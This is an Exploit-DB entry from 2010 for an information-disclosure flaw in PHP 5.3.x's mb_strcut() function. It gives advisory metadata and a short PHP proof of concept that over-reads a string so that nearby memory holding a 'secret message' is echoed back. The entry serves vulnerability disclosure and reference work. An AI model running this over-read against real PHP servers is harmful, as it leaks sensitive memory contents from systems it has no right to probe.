Lucene search

K
exploitdbMateusz KocielskiEDB-ID:34979
HistoryNov 07, 2010 - 12:00 a.m.

PHP 5.3.x - 'mb_strcut()' Information Disclosure

2010-11-0700:00:00
Mateusz Kocielski
www.exploit-db.com
38
php
5.3.x
mb_strcut
information disclosure
vulnerability
exploit
sensitive information
attacks

AI Score

7.4

Confidence

Low

# source: https://www.securityfocus.com/bid/44727/info
#
# PHP is prone to an information-disclosure vulnerability.
#
# Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
#

<?php
$b = "bbbbbbbbbbb";
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>